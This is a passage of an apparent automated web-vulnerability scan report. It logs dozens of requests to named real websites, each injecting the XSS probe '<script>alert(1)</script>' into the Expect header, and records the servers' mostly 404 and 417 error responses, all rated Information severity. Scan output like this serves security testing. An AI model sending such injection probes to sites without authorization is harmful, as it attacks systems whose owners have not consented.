Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nailedstuds.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.34
Date: Wed, 04 May 2011 01:57:14 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.34</center>
</body>
</html>

29.216. http://www.napaprolink.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.napaprolink.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.napaprolink.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:52:58 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.217. http://www.nationaltrailersupply.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationaltrailersupply.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nationaltrailersupply.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Wed, 04 May 2011 03:02:04 GMT
Connection: close
Content-Length: 39

<h1>Bad Request (Invalid Hostname)</h1>

29.218. http://www.nets.hk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nets.hk
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nets.hk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Wed, 04 May 2011 02:52:29 GMT
Server: Apache

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

29.219. http://www.newgrannytube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newgrannytube.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newgrannytube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 04:12:45 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.220. http://www.noneto.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.noneto.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.noneto.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Wed, 04 May 2011 02:08:14 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

29.221. http://www.northwestms.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.northwestms.edu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.northwestms.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 01:51:18 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.222. http://www.notable-quotes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.notable-quotes.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.notable-quotes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 00:49:31 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:01:12 GMT
ETag: "169bb0d-4e4-486ced93a17fb"
Vary: Accept-Encoding
Content-Length: 1252
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>
   
   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

29.223. http://www.nyl0ns.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nyl0ns.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nyl0ns.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 04:09:10 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.224. http://www.officefurniture2go.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officefurniture2go.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.officefurniture2go.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo HIS TELo OUR IND STA"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:05:44 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.225. http://www.ofree.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ofree.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ofree.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP
Date: Wed, 04 May 2011 01:53:28 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.226. http://www.old-young-movs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.old-young-movs.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.old-young-movs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 01:46:21 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.227. http://www.olddicks.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.olddicks.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.olddicks.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.46
Date: Wed, 04 May 2011 03:06:14 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.46</center>
</body>
</html>

29.228. http://www.oldmanwish.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oldmanwish.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oldmanwish.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Wed, 04 May 2011 03:24:53 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

29.229. http://www.onecallnow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onecallnow.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onecallnow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:50:13 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.230. http://www.onlineincomeflood.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlineincomeflood.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onlineincomeflood.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:48:29 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.231. http://www.onlyhairygirls.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlyhairygirls.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onlyhairygirls.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 01:37:35 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Keep-Alive: timeout=20

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.232. http://www.opinionrewardscenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opinionrewardscenter.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.opinionrewardscenter.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:13:03 GMT
Server: UltraDNS Client Redirection Server
Last-Modified: Wed, 04 May 2011 01:13:03 GMT
Accept-Ranges: none
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<html>
<head><title>UltraDNS Client Redirection Service</title></head>
<body><table border="2" width="100%">
<tr bgcolor="#FF4444"><th colspan="2"
...[SNIP]...

29.233. http://www.ouc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ouc.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ouc.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:38:06 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.234. http://www.paycheckcentral.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paycheckcentral.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.paycheckcentral.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 00:59:16 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 187

<html>
<head>
<title>Error</title>
</head>
<body>
<div>
<h3>Please try again later. Thank you.</h3>
</div>
</body>
</html>

29.235. http://www.pazsaz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pazsaz.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pazsaz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:25:48 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.236. http://www.pcc.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcc.edu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pcc.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:43:53 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.237. http://www.pcworld.co.nz/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcworld.co.nz
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pcworld.co.nz
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Wed, 04 May 2011 01:44:29 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 04 May 2011 01:44:29 GMT
Content-Type: text/html
Content-Length: 168

<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 400</P><P>Reason: Expect header value is not set to 100-continue</P></BODY></HTML>

29.238. http://www.petstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petstore.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.petstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:02:32 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.239. http://www.phonesale.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phonesale.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.phonesale.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 2122
Content-Type: text/html
Expires: Wed, 04 May 2011 01:41:35 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQCRCDRQR=MBNPHIJDLEAKOHLDBDEJOHAM; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:41:34 GMT


<!--include virtual="/includes/template/top.asp"-->
<!--include virtual="/includes/asp/inc_CDOsend.asp"-->
<table width="950" border="0" cellspacing="0" cellpadding="0">
<tr>
   <td width=
...[SNIP]...

29.240. http://www.piloselady.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.piloselady.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.piloselady.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.32
Date: Wed, 04 May 2011 01:12:30 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.32</center>
</body>
</html>

29.241. http://www.pipedomain.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pipedomain.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pipedomain.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 /favicon.ico
Server: Apache-Coyote/1.1
ETag: W/"244-1196720060000"
Last-Modified: Mon, 03 Dec 2007 22:14:20 GMT
Content-Type: text/html
Content-Length: 244
Date: Wed, 04 May 2011 03:45:36 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
       "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Error - Page Not Found</title>
</head>
<body>
<strong>The page you reques
...[SNIP]...

29.242. http://www.pixar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pixar.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pixar.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 504 Gateway Time-out
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 251
Expires: Wed, 04 May 2011 03:37:15 GMT
Date: Wed, 04 May 2011 03:37:15 GMT
Connection: close

<HTML><HEAD>
<TITLE>Gateway Timeout - In read </TITLE>
</HEAD><BODY>
<H1>Gateway Timeout</H1>
The proxy server did not receive a timely response from the upstream server.<P>
Reference&#32;&#35;1&#46;2
...[SNIP]...

29.243. http://www.pny.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pny.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pny.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Connection: Close
Content-Type: text/html

<div style="border: 3px solid #4991C5; font:1.5em; font-family:tahoma,calibri,arial; font-weight:bold; color:#1A4369; padding:5px; margin:10px; text-align:center"> The specified URL cannot be found.
...[SNIP]...

29.244. http://www.poolpartsonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.poolpartsonline.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.poolpartsonline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:39:00 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.245. http://www.posterrevolution.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.posterrevolution.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.posterrevolution.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:57:12 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.246. http://www.povo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.povo.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.povo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:46:50 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.247. http://www.presidentsusa.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.presidentsusa.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.presidentsusa.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 03:27:39 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Wed, 11 Mar 2009 02:33:42 GMT
ETag: "b415e64c-2ab-464ceb22c5135"
Vary: Accept-Encoding
Content-Length: 683
Accept-Ranges: bytes
Age: 0

   <HTML>
<HEAD>
<TITLE>Presidents</TITLE>
<META NAME="keywords" CONTENT="Redirect page for Presidents">
<META NAME="description" CONTENT="President of the United States">
</HEAD>
<BODY LINK="#000
...[SNIP]...

29.248. http://www.private-teen-movies.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.private-teen-movies.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.private-teen-movies.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Wed, 04 May 2011 03:22:41 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.20</center>
</body>
</html>

29.249. http://www.privatemomsvideos.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.privatemomsvideos.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.privatemomsvideos.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Server: nginx/0.7.62
Date: Wed, 04 May 2011 03:24:50 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

29.250. http://www.quiltersclubofamerica.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quiltersclubofamerica.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quiltersclubofamerica.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
CommunityServer: 4.1.31106.3070
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Tue, 03 May 2011 22:26:02 GMT; domain=quiltersclubofamerica.com; expires=Thu, 03-May-2012 03:26:02 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:26:02 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.251. http://www.radiological.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radiological.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.radiological.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:22:00 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.252. http://www.rajshri.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rajshri.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rajshri.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:29:58 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.253. http://www.rayjobs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rayjobs.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rayjobs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 610
Content-Type: text/html
test: test
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:55:40 GMT

<br />
<img src="http://www.raytheon.com/stellent/groups/public/documents/image/rtn_logo.gif" />
<br /><br />
<strong>File Not Found</strong>

<br /><br />
The File you have requested does not e
...[SNIP]...

29.254. http://www.rchobbies.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rchobbies.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rchobbies.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
